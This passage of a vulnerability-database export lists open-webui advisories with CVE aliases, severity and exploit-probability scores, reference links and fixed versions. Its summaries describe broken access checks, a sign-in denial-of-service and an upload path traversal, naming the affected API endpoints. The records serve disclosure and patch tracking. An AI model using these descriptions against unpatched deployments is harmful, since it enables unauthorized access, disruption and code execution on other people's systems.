reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/pull/23481
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/pull/23481
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44556
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44556
4
reference_url https://github.com/advisories/GHSA-hp5m-24vp-vq2q
reference_id GHSA-hp5m-24vp-vq2q
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hp5m-24vp-vq2q
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-hp5m-24vp-vq2q
reference_id GHSA-hp5m-24vp-vq2q
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:15:01Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-hp5m-24vp-vq2q
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44556, GHSA-hp5m-24vp-vq2q
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2xdz-v8cw-fygv
7
url VCID-32yb-vsfs-43a8
vulnerability_id VCID-32yb-vsfs-43a8
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the is_user_channel_member function checks whether a ChannelMember row exists but does not check the is_active field. When a user is deactivated from a group or DM channel (removed by the channel owner, or leaves voluntarily), their membership row persists with is_active=False and status='left'. Because the authorization check ignores this field, the deactivated user retains full read and write access to the channel via direct API calls. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44561
reference_id
reference_type
scores
0
value 0.00034
scoring_system epss
scoring_elements 0.10682
published_at 2026-06-12T12:55:00Z
1
value 0.00034
scoring_system epss
scoring_elements 0.1066
published_at 2026-06-14T12:55:00Z
2
value 0.00034
scoring_system epss
scoring_elements 0.10624
published_at 2026-06-11T12:55:00Z
3
value 0.00034
scoring_system epss
scoring_elements 0.10683
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44561
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44561
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44561
3
reference_url https://github.com/advisories/GHSA-hmgr-67hw-j2cq
reference_id GHSA-hmgr-67hw-j2cq
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hmgr-67hw-j2cq
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-hmgr-67hw-j2cq
reference_id GHSA-hmgr-67hw-j2cq
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T20:21:40Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-hmgr-67hw-j2cq
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44561, GHSA-hmgr-67hw-j2cq
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-32yb-vsfs-43a8
8
url VCID-3436-znsq-guds
vulnerability_id VCID-3436-znsq-guds
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, any authenticated user with low privileges can enumerate active background tasks across the system and stop tasks belonging to other users via the GET /api/tasks and POST /api/tasks/stop/{task_id} methods. This allows a casual user to disrupt system-wide chat usage by continuously canceling other users' active tasks. This is a real authorization vulnerability affecting integrity and usability in multi-user deployments. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45399
reference_id
reference_type
scores
0
value 0.00043
scoring_system epss
scoring_elements 0.13781
published_at 2026-06-14T12:55:00Z
1
value 0.00043
scoring_system epss
scoring_elements 0.13694
published_at 2026-06-11T12:55:00Z
2
value 0.00043
scoring_system epss
scoring_elements 0.1381
published_at 2026-06-13T12:55:00Z
3
value 0.00043
scoring_system epss
scoring_elements 0.13811
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45399
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/e7ff4768f8ffe1924b4576381c9e45e8a64350e4
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/e7ff4768f8ffe1924b4576381c9e45e8a64350e4
3
reference_url https://github.com/open-webui/open-webui/pull/23454
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/pull/23454
4
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45399
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45399
6
reference_url https://github.com/advisories/GHSA-8jjp-r2w2-4v22
reference_id GHSA-8jjp-r2w2-4v22
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8jjp-r2w2-4v22
7
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-8jjp-r2w2-4v22
reference_id GHSA-8jjp-r2w2-4v22
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T19:42:08Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-8jjp-r2w2-4v22
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-45399, GHSA-8jjp-r2w2-4v22
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3436-znsq-guds
9
url VCID-3hv8-ys1d-63a6
vulnerability_id VCID-3hv8-ys1d-63a6
summary In version v0.3.32 of open-webui/open-webui, the application allows users to submit large payloads in the email and password fields during the sign-in process due to the lack of character length validation on these inputs. This vulnerability can lead to a Denial of Service (DoS) condition when a user submits excessively large strings, exhausting server resources such as CPU, memory, and disk space, and rendering the service unavailable for legitimate users. This makes the server susceptible to resource exhaustion attacks without requiring authentication.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-12534
reference_id
reference_type
scores
0
value 0.00618
scoring_system epss
scoring_elements 0.70548
published_at 2026-06-13T12:55:00Z
1
value 0.00618
scoring_system epss
scoring_elements 0.70545
published_at 2026-06-14T12:55:00Z
2
value 0.00618
scoring_system epss
scoring_elements 0.70443
published_at 2026-06-11T12:55:00Z
3
value 0.00618
scoring_system epss
scoring_elements 0.70534
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-12534
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/blob/e8babe62bc8e466be0367703fd062a981f5c2394/src/lib/apis/auths/index.ts#L113-L142
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/blob/e8babe62bc8e466be0367703fd062a981f5c2394/src/lib/apis/auths/index.ts#L113-L142
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-12534
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-12534
4
reference_url https://huntr.com/bounties/c7c0a4e6-acd3-49b4-8684-2c2c27014b76
reference_id c7c0a4e6-acd3-49b4-8684-2c2c27014b76
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-20T17:50:33Z/
url https://huntr.com/bounties/c7c0a4e6-acd3-49b4-8684-2c2c27014b76
5
reference_url https://github.com/advisories/GHSA-g3mx-83mp-3rwc
reference_id GHSA-g3mx-83mp-3rwc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g3mx-83mp-3rwc
fixed_packages
0
url pkg:pypi/open-webui@0.3.33.dev1
purl pkg:pypi/open-webui@0.3.33.dev1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1svn-zazq-e3f2
3
vulnerability VCID-1tu1-b9de-nfaa
4
vulnerability VCID-2rs8-62x1-s7h7
5
vulnerability VCID-2xdz-v8cw-fygv
6
vulnerability VCID-32yb-vsfs-43a8
7
vulnerability VCID-3436-znsq-guds
8
vulnerability VCID-4rz6-hw32-jueb
9
vulnerability VCID-4sn4-mrbm-dfgh
10
vulnerability VCID-4v8w-kv6g-kkbc
11
vulnerability VCID-4x63-8x64-d3bq
12
vulnerability VCID-5319-t7jm-y3bx
13
vulnerability VCID-5jna-wvd7-j7cm
14
vulnerability VCID-5wfg-zqcy-c7ar
15
vulnerability VCID-5wzn-mfwg-ybc3
16
vulnerability VCID-66zh-9jk7-9bfx
17
vulnerability VCID-68jf-2utx-x7br
18
vulnerability VCID-6rbm-rm25-hqgy
19
vulnerability VCID-7j5a-pu4k-kucf
20
vulnerability VCID-7nbc-ng1s-suck
21
vulnerability VCID-8n6u-wgz9-1bgj
22
vulnerability VCID-8nzh-cpda-dkca
23
vulnerability VCID-8qvj-xndv-v3ay
24
vulnerability VCID-8y4k-pj2n-8uhm
25
vulnerability VCID-94nj-qkdf-xfhn
26
vulnerability VCID-9jud-sr2a-8yc3
27
vulnerability VCID-9zyk-459z-x3a4
28
vulnerability VCID-chug-ma8r-cucc
29
vulnerability VCID-cw4k-3s8z-uqh8
30
vulnerability VCID-dz6g-jgmg-wqce
31
vulnerability VCID-dzh3-rqx4-fqhv
32
vulnerability VCID-ef1t-pxjm-j7cz
33
vulnerability VCID-gw77-ux3j-qfaa
34
vulnerability VCID-hj5f-yk3y-ffdg
35
vulnerability VCID-jfs9-dps1-27a2
36
vulnerability VCID-jnsg-u9dy-r3d5
37
vulnerability VCID-k17g-bd9g-67f7
38
vulnerability VCID-k9jf-5jzd-pkge
39
vulnerability VCID-mn21-kwuu-w7by
40
vulnerability VCID-n4ma-zcpv-5fbp
41
vulnerability VCID-nxvm-97r4-6ybz
42
vulnerability VCID-pkds-1xgn-q3bv
43
vulnerability VCID-pvep-chj7-ekeg
44
vulnerability VCID-pwsg-72yy-quhk
45
vulnerability VCID-q682-k826-efhv
46
vulnerability VCID-qgfh-7u8n-y7c7
47
vulnerability VCID-qjt1-zxx8-r7ht
48
vulnerability VCID-r7vt-4bqm-f7hb
49
vulnerability VCID-reqw-pfm8-c7g5
50
vulnerability VCID-rhhj-rccv-87hw
51
vulnerability VCID-s625-eg1w-gfd1
52
vulnerability VCID-t571-d65a-cyb2
53
vulnerability VCID-tz2k-gazs-mqgd
54
vulnerability VCID-u25g-p4nx-gqd1
55
vulnerability VCID-ujye-g4rj-8be5
56
vulnerability VCID-um53-kf7u-kkg6
57
vulnerability VCID-vghe-uuzj-m7cu
58
vulnerability VCID-vkx3-71kv-sugt
59
vulnerability VCID-w2vd-r3hr-w3bt
60
vulnerability VCID-wb88-83cj-ffhy
61
vulnerability VCID-wcz4-vwx4-tufb
62
vulnerability VCID-yug9-shts-kufb
63
vulnerability VCID-yysb-dk2k-f7g4
64
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.33.dev1
aliases CVE-2024-12534, GHSA-g3mx-83mp-3rwc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3hv8-ys1d-63a6
10
url VCID-4rz6-hw32-jueb
vulnerability_id VCID-4rz6-hw32-jueb
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id). Version 0.8.6 patches the issue.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-29070
reference_id
reference_type
scores
0
value 0.00051
scoring_system epss
scoring_elements 0.16299
published_at 2026-06-14T12:55:00Z
1
value 0.00051
scoring_system epss
scoring_elements 0.16175
published_at 2026-06-11T12:55:00Z
2
value 0.00051
scoring_system epss
scoring_elements 0.16329
published_at 2026-06-13T12:55:00Z
3
value 0.00051
scoring_system epss
scoring_elements 0.16317
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-29070
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/knowledge.py#L803
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/knowledge.py#L803
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-29070
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-29070
4
reference_url https://github.com/advisories/GHSA-26gm-93rw-cchf
reference_id GHSA-26gm-93rw-cchf
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-26gm-93rw-cchf
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-26gm-93rw-cchf
reference_id GHSA-26gm-93rw-cchf
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T11:49:47Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-26gm-93rw-cchf
fixed_packages
0
url pkg:pypi/open-webui@0.8.6
purl pkg:pypi/open-webui@0.8.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-6rbm-rm25-hqgy
13
vulnerability VCID-8nzh-cpda-dkca
14
vulnerability VCID-8y4k-pj2n-8uhm
15
vulnerability VCID-chug-ma8r-cucc
16
vulnerability VCID-cw4k-3s8z-uqh8
17
vulnerability VCID-dz6g-jgmg-wqce
18
vulnerability VCID-dzh3-rqx4-fqhv
19
vulnerability VCID-ef1t-pxjm-j7cz
20
vulnerability VCID-hj5f-yk3y-ffdg
21
vulnerability VCID-jfs9-dps1-27a2
22
vulnerability VCID-k9jf-5jzd-pkge
23
vulnerability VCID-n4ma-zcpv-5fbp
24
vulnerability VCID-nxvm-97r4-6ybz
25
vulnerability VCID-pkds-1xgn-q3bv
26
vulnerability VCID-q682-k826-efhv
27
vulnerability VCID-qgfh-7u8n-y7c7
28
vulnerability VCID-qjt1-zxx8-r7ht
29
vulnerability VCID-r7vt-4bqm-f7hb
30
vulnerability VCID-reqw-pfm8-c7g5
31
vulnerability VCID-rhhj-rccv-87hw
32
vulnerability VCID-s625-eg1w-gfd1
33
vulnerability VCID-t571-d65a-cyb2
34
vulnerability VCID-um53-kf7u-kkg6
35
vulnerability VCID-vghe-uuzj-m7cu
36
vulnerability VCID-vkx3-71kv-sugt
37
vulnerability VCID-w2vd-r3hr-w3bt
38
vulnerability VCID-wb88-83cj-ffhy
39
vulnerability VCID-wcz4-vwx4-tufb
40
vulnerability VCID-yug9-shts-kufb
41
vulnerability VCID-yysb-dk2k-f7g4
42
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6
aliases CVE-2026-29070, GHSA-26gm-93rw-cchf
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4rz6-hw32-jueb
11
url VCID-4sn4-mrbm-dfgh
vulnerability_id VCID-4sn4-mrbm-dfgh
summary OpenWebUI version 0.3.0 contains a vulnerability in the audio API endpoint `/audio/api/v1/transcriptions` that allows for arbitrary file upload. The application performs insufficient validation on the `file.content_type` and allows user-controlled filenames, leading to a path traversal vulnerability. This can be exploited by an authenticated user to overwrite critical files within the Docker container, potentially leading to remote code execution as the root user.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-8060
reference_id
reference_type
scores
0
value 0.02108
scoring_system epss
scoring_elements 0.84529
published_at 2026-06-13T12:55:00Z
1
value 0.02108
scoring_system epss
scoring_elements 0.84521
published_at 2026-06-14T12:55:00Z
2
value 0.02108
scoring_system epss
scoring_elements 0.84464
published_at 2026-06-11T12:55:00Z
3
value 0.02108
scoring_system epss
scoring_elements 0.84519
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-8060
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/613a087387c094e71ee91d29c015195ef401e160
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/613a087387c094e71ee91d29c015195ef401e160
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-8060
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-8060
4
reference_url https://huntr.com/bounties/a3b1a4b7-c723-496d-842c-844cc0988fe9
reference_id a3b1a4b7-c723-496d-842c-844cc0988fe9
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-20T17:49:58Z/
url https://huntr.com/bounties/a3b1a4b7-c723-496d-842c-844cc0988fe9
5
reference_url https://github.com/advisories/GHSA-ff5c-56m7-vc75
reference_id GHSA-ff5c-56m7-vc75
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-ff5c-56m7-vc75
fixed_packages
0
url pkg:pypi/open-webui@0.5.17
purl pkg:pypi/open-webui@0.5.17
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7j5a-pu4k-kucf
17
vulnerability VCID-7nbc-ng1s-suck
18
vulnerability VCID-8n6u-wgz9-1bgj
19
vulnerability VCID-8nzh-cpda-dkca
20
vulnerability VCID-8y4k-pj2n-8uhm
21
vulnerability VCID-94nj-qkdf-xfhn
22
vulnerability VCID-9jud-sr2a-8yc3
23
vulnerability VCID-chug-ma8r-cucc
24
vulnerability VCID-cw4k-3s8z-uqh8
25
vulnerability VCID-dz6g-jgmg-wqce
26
vulnerability VCID-dzh3-rqx4-fqhv
27
vulnerability VCID-ef1t-pxjm-j7cz
28
vulnerability VCID-gw77-ux3j-qfaa
29
vulnerability VCID-hj5f-yk3y-ffdg
30
vulnerability VCID-jfs9-dps1-27a2
31
vulnerability VCID-jnsg-u9dy-r3d5
32
vulnerability VCID-k17g-bd9g-67f7
33
vulnerability VCID-k9jf-5jzd-pkge
34
vulnerability VCID-mn21-kwuu-w7by
35
vulnerability VCID-n4ma-zcpv-5fbp
36
vulnerability VCID-nxvm-97r4-6ybz
37
vulnerability VCID-pkds-1xgn-q3bv
38
vulnerability VCID-pvep-chj7-ekeg
39
vulnerability VCID-pwsg-72yy-quhk
40
vulnerability VCID-q682-k826-efhv
41
vulnerability VCID-qgfh-7u8n-y7c7
42
vulnerability VCID-qjt1-zxx8-r7ht
43
vulnerability VCID-r7vt-4bqm-f7hb
44
vulnerability VCID-reqw-pfm8-c7g5
45
vulnerability VCID-rhhj-rccv-87hw
46
vulnerability VCID-s625-eg1w-gfd1
47
vulnerability VCID-t571-d65a-cyb2
48
vulnerability VCID-tz2k-gazs-mqgd
49
vulnerability VCID-u25g-p4nx-gqd1
50
vulnerability VCID-ujye-g4rj-8be5
51
vulnerability VCID-um53-kf7u-kkg6
52
vulnerability VCID-vghe-uuzj-m7cu
53
vulnerability VCID-vkx3-71kv-sugt
54
vulnerability VCID-w2vd-r3hr-w3bt
55
vulnerability VCID-wb88-83cj-ffhy
56
vulnerability VCID-wcz4-vwx4-tufb
57
vulnerability VCID-yug9-shts-kufb
58
vulnerability VCID-yysb-dk2k-f7g4
59
